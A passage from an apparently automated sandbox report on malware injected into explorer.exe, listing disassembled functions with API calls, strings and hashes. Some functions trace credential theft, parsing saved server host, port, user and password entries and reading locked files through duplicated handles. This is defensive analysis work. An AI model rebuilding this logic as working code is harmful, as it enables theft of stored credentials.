                                                                                                                                                        • Part of subcall function 00A01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00A01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2), ref: 00A01020
                                                                                                                                                        • Part of subcall function 00A01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01027
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00A02EE4
                                                                                                                                                      • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00A02F54
                                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 00A02F62
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1066184869-0
                                                                                                                                                      • Opcode ID: 334167efc11ee5c8dbc5d292390ad1e3c5875fbeed1059a3acd5ea291c85ae9f
                                                                                                                                                      • Instruction ID: b7139e3484adaf201fd8cc59c3012ac59b996fb03ac27be2bcc0888eafd31641
                                                                                                                                                      • Opcode Fuzzy Hash: 334167efc11ee5c8dbc5d292390ad1e3c5875fbeed1059a3acd5ea291c85ae9f
                                                                                                                                                      • Instruction Fuzzy Hash: 45018631204355ABC7159F21EC09EAF7FA9EFC4391F00442DF95A921D1DE358856EBA1
                                                                                                                                                      Function 00A04B72 Relevance: 4.5, APIs: 3, Instructions: 8COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitInitializeProcessUninitialize
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4175140541-0
                                                                                                                                                      • Opcode ID: abfbd102861a3ef25796391fa024f3565db1e09add6371a6b56e2025d368c028
                                                                                                                                                      • Instruction ID: 1ab946e373e36b150141612820ce3e6b8a6037b0e62aa2e0c8bcc04dcf20c8ec
                                                                                                                                                      • Opcode Fuzzy Hash: abfbd102861a3ef25796391fa024f3565db1e09add6371a6b56e2025d368c028
                                                                                                                                                      • Instruction Fuzzy Hash: 9AC04CB07453045BE680ABE06D0D75D3514BB04753F444104F309870D1DA5044028622
                                                                                                                                                      Function 00A09FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00A09FF8
                                                                                                                                                      Strings
                                                                                                                                                      • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 00A0A00E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                      • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                                                                      • API String ID: 10892065-982776804
                                                                                                                                                      • Opcode ID: 36d285916002ec2125a97c41e0a63d8eb3d6f1e205afcba7fa97b54534069199
                                                                                                                                                      • Instruction ID: 86ec131f5ce17b4c57d911ac4c2f2c88dbb060f9e37c84d8e0c397b8e21fd62f
                                                                                                                                                      • Opcode Fuzzy Hash: 36d285916002ec2125a97c41e0a63d8eb3d6f1e205afcba7fa97b54534069199
                                                                                                                                                      • Instruction Fuzzy Hash: 56F02B7260434ABAE7305F94BC84F676BACDBA4785F140819FD46D21C1E6B1AC01C331
                                                                                                                                                      Function 00A01AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00A02E83,PathToExe,00000000,00000000), ref: 00A01B16
                                                                                                                                                        • Part of subcall function 00A01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00A01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2), ref: 00A01020
                                                                                                                                                        • Part of subcall function 00A01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01027
                                                                                                                                                        • Part of subcall function 00A019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A1E
                                                                                                                                                        • Part of subcall function 00A019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A3C
                                                                                                                                                        • Part of subcall function 00A019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A75
                                                                                                                                                        • Part of subcall function 00A019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A98
                                                                                                                                                      Strings
                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00A01B40
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                      • API String ID: 2162223993-2036018995
                                                                                                                                                      • Opcode ID: 7ac2dee442b54e284f1b21d790af41fe460c3d52acc9ff7cc15591e45683d04f
                                                                                                                                                      • Instruction ID: fa4a052f8d466780b674de4e0df4693674cd6604bc18db7948c25bea0e32e99a
                                                                                                                                                      • Opcode Fuzzy Hash: 7ac2dee442b54e284f1b21d790af41fe460c3d52acc9ff7cc15591e45683d04f
                                                                                                                                                      • Instruction Fuzzy Hash: 9AF0E03670064C17D7116E2AEC80EB73A9ED7D23D73070029F56AC3281DF266C415174
                                                                                                                                                      Function 00A0A33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00A0A35F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                      • String ID: winSeekFile
                                                                                                                                                      • API String ID: 973152223-3168307952
                                                                                                                                                      • Opcode ID: ba80436324bdd92fd09acbdd9f1d1bb604be89a009f2f0e7673f254ec4b803a6
                                                                                                                                                      • Instruction ID: 504680fb4fe77a2fc018ae53ac6d3e91562db755048c9c9b2f8ee42a0c566ca0
                                                                                                                                                      • Opcode Fuzzy Hash: ba80436324bdd92fd09acbdd9f1d1bb604be89a009f2f0e7673f254ec4b803a6
                                                                                                                                                      • Instruction Fuzzy Hash: A0F0BE34614308BFD711DFA4EC019BB7BBAEB54321F14C769F961CA2D0EA70DD0596A2
                                                                                                                                                      Function 00A09EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(04FF0000,00000000,?), ref: 00A09EB5
                                                                                                                                                      Strings
                                                                                                                                                      • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00A09ECD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                                                                                      • API String ID: 1279760036-667713680
                                                                                                                                                      • Opcode ID: 5283493db5d4de63a4cf58035e9da67808ac0daaa9a34d4b1e04e229ebd967e7
                                                                                                                                                      • Instruction ID: f67d02c978676639b0a1c4efbbf8271d22178871746ec3abda629fc55bd9f733
                                                                                                                                                      • Opcode Fuzzy Hash: 5283493db5d4de63a4cf58035e9da67808ac0daaa9a34d4b1e04e229ebd967e7
                                                                                                                                                      • Instruction Fuzzy Hash: EEE0C273A082107BC212A7C4BC05F2FBB78EBA4F90F050415FE04A62A1C6B0AC02C7A2
                                                                                                                                                      Function 00A09EE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(04FF0000,00000000,?), ref: 00A09EF8
                                                                                                                                                      Strings
                                                                                                                                                      • failed to HeapFree block %p (%lu), heap=%p, xrefs: 00A09F0E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                                                                                      • API String ID: 3298025750-4030396798
                                                                                                                                                      • Opcode ID: a505afd1c841de9e7b3e60cda2d84e908929d84e55e8d669ea37584a0a215de7
                                                                                                                                                      • Instruction ID: 79909363b766c9ff07561576b36be078eef3d02039c5f363736ef883982e0062
                                                                                                                                                      • Opcode Fuzzy Hash: a505afd1c841de9e7b3e60cda2d84e908929d84e55e8d669ea37584a0a215de7
                                                                                                                                                      • Instruction Fuzzy Hash: A3D012725082027BD2019BD4BC46F2F7B79ABA5B40F480418F604A50E6D7B56452AB61
                                                                                                                                                      Function 00A01B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00A02893,00000000,00000000,00000000,?), ref: 00A01B82
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00A01B8F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateFileHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3498533004-0
                                                                                                                                                      • Opcode ID: c61e762ef3cf9b5e260f4fe381da1c2e79e90d4216adac130e9dc3d8089f1e7b
                                                                                                                                                      • Instruction ID: 49828ca0d6ecda711c952b8207b35fa4f0cf14ee2d1a947bc6d6d39987b10b58
                                                                                                                                                      • Opcode Fuzzy Hash: c61e762ef3cf9b5e260f4fe381da1c2e79e90d4216adac130e9dc3d8089f1e7b
                                                                                                                                                      • Instruction Fuzzy Hash: F6D0E2A125263062E5B667657C08EE76E1CAF03BBAB444618B41D960D0E2248C8782E0
                                                                                                                                                      Function 00A01011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00A0116F
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00A01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2), ref: 00A01020
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01027
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2580854192-0
                                                                                                                                                      • Opcode ID: c4191d8c6e7b31bd1d87697c4e8f8a69203f93b7eff8a3367d54eac6b0324e2f
                                                                                                                                                      • Instruction ID: 8cc2f8a9db5568875ffeff5729a9b120daab61d81a8d67700b0427b2c7ddcaca
                                                                                                                                                      • Opcode Fuzzy Hash: c4191d8c6e7b31bd1d87697c4e8f8a69203f93b7eff8a3367d54eac6b0324e2f
                                                                                                                                                      • Instruction Fuzzy Hash: 33C08C3100032052C9A06BE03D0CBDA2B08FF09323F400241B60193182CA658C4286A0
                                                                                                                                                      Function 00A012A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlZeroMemory.NTDLL(?,00000018), ref: 00A012B5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryZero
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 816449071-0
                                                                                                                                                      • Opcode ID: bf54a494d9fc73d4286726cad9fcab97f8a4ecf647995e1f02b856559e3bd5ba
                                                                                                                                                      • Instruction ID: 1505845ef6c8687a18a7a6e2d94eb08c53a40e159c5fe994cce7cc2a44188d31
                                                                                                                                                      • Opcode Fuzzy Hash: bf54a494d9fc73d4286726cad9fcab97f8a4ecf647995e1f02b856559e3bd5ba
                                                                                                                                                      • Instruction Fuzzy Hash: 0311D2B1A01209AFDB10DFA9E984AFEBBBCFB08341B504129F945E7240D7349D01CB60
                                                                                                                                                      Function 00A01B9D Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000000,00000000,00A02C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00A01BAA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                      • Opcode ID: 8863b78e52562619b81f70c92c53fedb8a70e8866e13ba688e19c5056690b30c
                                                                                                                                                      • Instruction ID: 1de596a18ec9eca8ac9a3f0377c165a36385e5f8ed72599108784e1dc1cff9ff
                                                                                                                                                      • Opcode Fuzzy Hash: 8863b78e52562619b81f70c92c53fedb8a70e8866e13ba688e19c5056690b30c
                                                                                                                                                      • Instruction Fuzzy Hash: C8D0C933E1653582DA6457B878848D6B6906A4277635A07B4FC26F75D4E325CC8352D0
                                                                                                                                                      Function 00A01677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A01684
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateGlobalStream
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2244384528-0
                                                                                                                                                      • Opcode ID: 5a9788192ae3526678a8c94ac7ec264db65bd0d199da85932f43aff090ad8f7c
                                                                                                                                                      • Instruction ID: 09a1c0d6b3c79a7322cd90cff17f39e5a145c5c6a82773f5855499ff8e4c8b8b
                                                                                                                                                      • Opcode Fuzzy Hash: 5a9788192ae3526678a8c94ac7ec264db65bd0d199da85932f43aff090ad8f7c
                                                                                                                                                      • Instruction Fuzzy Hash: 8BC01230520221AEE7601BA09C09BCA26D4AF197A2F0A0A2AA0819A0C0E2A508C08A90
                                                                                                                                                      Function 00A0104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00A0158A), ref: 00A01056
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                      • Opcode ID: 209ae1fdf9e75bca1f477b955e5cc26fd30f7cfb8d390dc6cbdeb4990ae19379
                                                                                                                                                      • Instruction ID: d28a5b92003d74a71ed862e2af83e3c50f6e3079066ec48b2f8c040bcc8a48d0
                                                                                                                                                      • Opcode Fuzzy Hash: 209ae1fdf9e75bca1f477b955e5cc26fd30f7cfb8d390dc6cbdeb4990ae19379
                                                                                                                                                      • Instruction Fuzzy Hash: E9A002F07D53007AFDA997A2AE1FF552938A740F03F504344B30D7D0D055E47501852D
                                                                                                                                                      Function 00A0105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00A04A5B,?,?,00000000,?,?,?,?,00A04B66,?), ref: 00A01065
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                      • Opcode ID: 892d7cb6a763827318dec2621c5e74ef33c23d17cb6510246c6dd48704ac0052
                                                                                                                                                      • Instruction ID: 13a615bd05f740a3a2afee24a58f7347c549acb822a7a5409af1511bdf047c86
                                                                                                                                                      • Opcode Fuzzy Hash: 892d7cb6a763827318dec2621c5e74ef33c23d17cb6510246c6dd48704ac0052
                                                                                                                                                      • Instruction Fuzzy Hash: 86A00270690B0066EDF497605D0AF1526147740B03F6046447241AB0D14DA5E0458A18

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 00A04440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CoCreateInstance.COMBASE(00A562B0,00000000,00000001,00A562A0,?), ref: 00A0445F
                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00A044AA
                                                                                                                                                      • lstrcmpiW.KERNEL32(RecentServers,?), ref: 00A0456E
                                                                                                                                                      • lstrcmpiW.KERNEL32(Servers,?), ref: 00A0457D
                                                                                                                                                      • lstrcmpiW.KERNEL32(Settings,?), ref: 00A0458C
                                                                                                                                                        • Part of subcall function 00A011E1: lstrlenW.KERNEL32(?,771AF360,00000000,?,00000000,?,00A046E3), ref: 00A011ED
                                                                                                                                                        • Part of subcall function 00A011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A0120F
                                                                                                                                                        • Part of subcall function 00A011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A01231
                                                                                                                                                      • lstrcmpiW.KERNEL32(Server,?), ref: 00A045BE
                                                                                                                                                      • lstrcmpiW.KERNEL32(LastServer,?), ref: 00A045CD
                                                                                                                                                      • lstrcmpiW.KERNEL32(Host,?), ref: 00A04657
                                                                                                                                                      • lstrcmpiW.KERNEL32(Port,?), ref: 00A04679
                                                                                                                                                      • lstrcmpiW.KERNEL32(User,?), ref: 00A0469F
                                                                                                                                                      • lstrcmpiW.KERNEL32(Pass,?), ref: 00A046C5
                                                                                                                                                      • wsprintfW.USER32 ref: 00A0471E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                                                                      • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                                                                      • API String ID: 2230072276-1234691226
                                                                                                                                                      • Opcode ID: 65c5a396df1ff65c819715c64397eea5ced345c1325093db6f2155479da0399e
                                                                                                                                                      • Instruction ID: 548f39aeadedf7a9ea015b46c296eda31e2af46476a4731c3bd34e3dfab28662
                                                                                                                                                      • Opcode Fuzzy Hash: 65c5a396df1ff65c819715c64397eea5ced345c1325093db6f2155479da0399e
                                                                                                                                                      • Instruction Fuzzy Hash: 7EB1F7B1204306AFD740DF64D884E6AB7E9FFC9745F10895CF6858B2A0DB71E90ACB52
                                                                                                                                                      Function 00A0349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 00A034C0
                                                                                                                                                        • Part of subcall function 00A033C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 00A03401
                                                                                                                                                      • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00A037A8), ref: 00A034E9
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00A0351E
                                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00A03541
                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00A03586
                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 00A0358F
                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,File), ref: 00A035B6
                                                                                                                                                      • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 00A035DE
                                                                                                                                                      • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00A035F6
                                                                                                                                                      • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00A03606
                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00A0361E
                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 00A03631
                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00A03658
                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00A0366B
                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A03681
                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00A036AD
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00A036C0
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00A037A8), ref: 00A036F5
                                                                                                                                                        • Part of subcall function 00A01C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00A01CC0
                                                                                                                                                        • Part of subcall function 00A01C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00A01CDA
                                                                                                                                                        • Part of subcall function 00A01C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00A01CE6
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00A037A8), ref: 00A03707
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                                                                                      • String ID: File
                                                                                                                                                      • API String ID: 3915112439-749574446
                                                                                                                                                      • Opcode ID: dde75ced568149db1569dc0acd01440bf304542ae50f5fd8524cab4adb9ba796
                                                                                                                                                      • Instruction ID: 636a03b48524c6c27d8123485b21b0b8d84b2a5638c7523d4dd40c500b2038a5
                                                                                                                                                      • Opcode Fuzzy Hash: dde75ced568149db1569dc0acd01440bf304542ae50f5fd8524cab4adb9ba796
                                                                                                                                                      • Instruction Fuzzy Hash: 99619E71204308BFDB20AF61EC84B6B7BADFF84755F400928F986972E1DB36DA458B51
                                                                                                                                                      Function 00A54438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 00A54502
                                                                                                                                                      • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 00A5475F
                                                                                                                                                      • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00A54803
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                      • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
